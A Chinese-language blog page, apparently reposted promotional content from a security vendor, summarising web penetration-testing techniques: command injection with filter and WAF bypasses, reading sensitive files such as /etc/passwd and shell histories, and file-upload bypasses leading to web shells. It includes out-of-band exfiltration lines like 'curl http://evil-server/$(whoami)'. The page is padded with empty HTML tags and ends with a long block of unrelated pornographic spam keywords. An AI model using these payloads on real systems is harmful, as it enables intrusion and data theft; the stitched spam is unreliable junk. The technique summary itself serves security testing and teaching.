• <li id="0bn34"><legend id="0bn34"><th id="0bn34"></th></legend></li>

      <label id="0bn34"><mark id="0bn34"><strong id="0bn34"></strong></mark></label>
      <span id="0bn34"><optgroup id="0bn34"></optgroup></span> <label id="0bn34"><mark id="0bn34"><strong id="0bn34"></strong></mark></label>

      <rt id="0bn34"></rt>
      <span id="0bn34"><optgroup id="0bn34"><center id="0bn34"></center></optgroup></span>
      <li id="0bn34"><big id="0bn34"><listing id="0bn34"></listing></big></li>
      網站命令執行滲透測試步驟詳情
      • 更新時間:2025-05-14 14:50:44
      • 開發經驗
      • 發布時間:3年前
      • 719

      哈嘍大家好,近期我們Sine安全對客戶平臺進行滲透測試的時候,發現有一些命令執行的漏洞測試語句和函數,導致服務器被提權被入侵,上一節提到XSS跨站腳本攻擊檢測方法,本章來總和一下腳本執行命令的詳細檢測手段,以及繞過waf的辦法,只有這樣詳細的對平臺進行安全測試才能保障整個平臺安全穩定。


      3.5.1. 簡介

      命令注入通常因為指Web應用在服務器上拼接系統命令而造成的漏洞。

      該類漏洞通常出現在調用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機名/IP/掩碼/網關、查看系統信息以及關閉重啟等功能,或者一些站點提供如ping、nslookup、提供發送郵件、轉換圖片等功能都可能出現該類漏洞。


      3.5.2. 常見危險函數

      3.5.2.1. PHP

      system

      exec

      passthru

      shell_exec

      popen

      proc_open

      3.5.2.2. Python

      system

      popen

      subprocess.call

      spawn

      3.5.2.3. Java

      java.lang.Runtime.getRuntime().exec(command)

      3.5.3. 常見注入方式

      分號分割

      || && & 分割

      | 管道符

      \r\n %d0%a0 換行

      反引號解析

      $() 替換

      3.5.4. 無回顯技巧

      bash反彈shell

      DNS帶外數據

      http帶外

      curl http://evil-server/$(whoami)

      wget http://evil-server/$(whoami)

      無帶外時利用 sleep 或其他邏輯構造布爾條件

      3.5.5. 常見繞過方式

      3.5.5.1. 空格繞過

      < 符號 cat<123

      \t / %09

      ${IFS} 其中{}用來截斷,比如cat$IFS2會被認為IFS2是變量名。另外,在后面加個$可以起到截斷的作用,一般用$9,因為$9是當前系統shell進程的第九個參數的持有者,它始終為空字符串

      3.5.5.2. 黑名單繞過

      a=l;b=s;$a$b

      echo "bHM=" | -d

      /?in/?s => /bin/ls

      連接符 cat /etc/pass'w'd

      未定義的初始化變量 cat$x /etc/passwd

      3.5.5.3. 長度限制繞過

      >wget\

      >foo.\

      >com

      ls -t>a

      sh a

      上面的方法為通過命令行重定向寫入命令,接著通過ls按時間排序把命令寫入文件,最后執行 直接在Linux終端下執行的話,創建文件需要在重定向符號之前添加命令 這里可以使用一些諸如w,[之類的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能結束,這樣就等于標準輸入流的重定向 而在php中 , 使用 shell_exec 等執行系統命令的函數的時候 , 是不存在標準輸入流的,所以可以直接創建文件

      3.5.6. 常用符號

      3.5.6.1. 命令分隔符

      %0a / %0d / \n / \r

      ;

      & / &&

      3.5.6.2. 通配符

      * 0到無窮個任意字符

      ? 一個任意字符

      [ ] 一個在括號內的字符,e.g. [abcd]

      [ - ] 在編碼順序內的所有字符

      [^ ] 一個不在括號內的字符

      3.5.7. 防御

      不使用時禁用相應函數

      盡量不要執行外部的應用程序或命令

      做輸入的格式檢查

      轉義命令中的所有shell元字符

      shell元字符包括 #&;`,|*?~<>^()[]{}$\

      3.6. 文件讀取

      3.6. 文件讀取

      考慮讀取可能有敏感信息的文件

      用戶目錄下的敏感文件

      .bash_history

      .zsh_history

      .profile

      .bashrc

      .gitconfig

      .viminfo

      passwd

      應用的配置文件

      /etc/apache2/apache2.conf

      /etc/nginx/nginx.conf

      應用的日志文件

      /var/log/apache2/access.log

      /var/log/nginx/access.log

      站點目錄下的敏感文件

      .svn/entries

      .git/HEAD

      WEB-INF/web.xml

      .htaccess

      特殊的備份文件

      .swp

      .swo

      .bak

      index.php~

      Python的Cache

      __pycache__\__init__.cpython-35.pyc

      3.7. 文件上傳

      3.7.1. 文件類型檢測繞過

      3.7.1.1. 更改請求繞過

      有的站點僅僅在前端檢測了文件類型,這種類型的檢測可以直接修改網絡請求繞過。同樣的,有的站點在后端僅檢查了HTTP Header中的信息,比如 Content-Type 等,這種檢查同樣可以通過修改網絡請求繞過。


      3.7.1.2. Magic檢測繞過

      有的站點使用文件頭來檢測文件類型,這種檢查可以在Shell前加入對應的字節以繞過檢查。幾種常見的文件類型的頭字節如下表所示


      3.7.1.3. 后綴繞過

      部分服務僅根據后綴、上傳時的信息或Magic Header來判斷文件類型,此時可以繞過。

      php由于歷史原因,部分解釋器可能支持符合正則 /ph(p[2-7]?|t(ml)?)/ 的后綴,如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上傳php文件時測試該類型。

      jsp引擎則可能會解析 jspx / jspf / jspa / jsw / jsv / jtml 等后綴,asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等后綴。

      除了這些繞過,其他的后綴同樣可能帶來問題,如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。


      3.7.1.4. 系統命名繞過

      在Windows系統中,上傳 index.php. 會重命名為 . ,可以繞過后綴檢查。也可嘗試

      index.php%20, index.php:1.jpg index.php::$DATA 等。在Linux系統中,可以嘗試上傳名為 index.php/. 或 ./aa/../index.php/. 的文件


      3.7.1.5. .user.ini

      在php執行的過程中,除了主 php.ini 之外,PHP 還會在每個目錄下掃描 INI 文件,從被執行的 PHP 文件所在目錄開始一直上升到 web 根目錄($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被執行的 PHP 文件在 web 根目錄之外,則只掃描該目錄。.user.ini 中可以定義除了PHP_INI_SYSTEM以外的模式的選項,故可以使用 .user.ini 加上非php后綴的文件構造一個shell,比如 auto_prepend_file=01.gif 。


      3.7.1.6. WAF繞過

      有的waf在編寫過程中考慮到性能原因,只處理一部分數據,這時可以通過加入大量垃圾數據來繞過其處理函數。

      另外,Waf和Web系統對 boundary 的處理不一致,可以使用錯誤的 boundary 來完成繞過。


      3.7.1.7. 競爭上傳繞過

      有的服務器采用了先保存,再刪除不合法文件的方式,在這種服務器中,可以反復上傳一個會生成Web Shell的文件并嘗試訪問,多次之后即可獲得Shell。


      3.7.2. 攻擊技巧

      3.7.2.1. Apache重寫GetShell

      Apache可根據是否允許重定向考慮上傳.htaccess

      內容為

      AddType application/x-httpd-php .png php_flag engine 1

      就可以用png或者其他后綴的文件做php腳本了


      3.7.2.2. 軟鏈接任意讀文件

      上傳的壓縮包文件會被解壓的文件時,可以考慮上傳含符號鏈接的文件 若服務器沒有做好防護,可實現任意文件讀取的效果,如果覺得防護做的不到位 不放心的話,可以找專業的網站安全公司來處理解決,畢竟術業有專攻,國內做的比較好的公司如:Sinesafe,綠盟,啟明星辰等等。


      3.7.3. 防護技巧

      使用白名單限制上傳文件的類型

      使用更嚴格的文件類型檢查方式

      限制Web Server對上傳文件夾的解析

      我們專注高端建站,小程序開發、軟件系統定制開發、BUG修復、物聯網開發、各類API接口對接開發等。十余年開發經驗,每一個項目承諾做到滿意為止,多一次對比,一定讓您多一份收獲!

      本文章出于推來客官網,轉載請表明原文地址:https://www.tlkjt.com/experience/7583.html
      推薦文章

      在線客服

      掃碼聯系客服

      3985758

      回到頂部

      又粗又大又爽又紧免费视频| 冲田杏梨AV一区二区三区| 3d动漫精品啪啪一区二区免费| 国产精品白丝AV网站| free性欧美另类高清| 好男人视频社区精品免费| 一级特黄a大片免费| 成人欧美在线视频| 久久久无码精品亚洲日韩按摩| 日韩人妻高清精品专区| 亚洲国产成人久久一区二区三区 | 国产亚洲综合色就色| 美女久久久久久| 国产亚洲av综合人人澡精品| 美女的尿口无遮掩的照片| 国产传媒在线观看| 色悠久久久久久久综合网| 国产成人免费观看| 能顺利播放的男男网站free| 国产午夜爽爽窝窝在线观看| 青青青国产精品一区二区| 国产欧美高清在线观看| 2019av在线视频| 国产在线精品一区二区| 豪妇荡乳1一5白玉兰免费下载| 国产成人福利免费视频| 风间由美100部合集| 国产亚洲国产bv网站在线| 粗大的内捧猛烈进出在线视频| 厨房切底征服岳| 神尾舞高清无在码在线| 午夜成人精品福利网站在线观看| 精品人妻AV无码一区二区三区| 国产91精品一区二区麻豆亚洲| 精品国产亚洲一区二区三区 | 极品丝袜乱系列全集| 亚洲国产成人精品电影| 机机对机机的30分钟免费软件| 久草资源在线观看| 日日婷婷夜日日天干| 久久精品一区二区影院|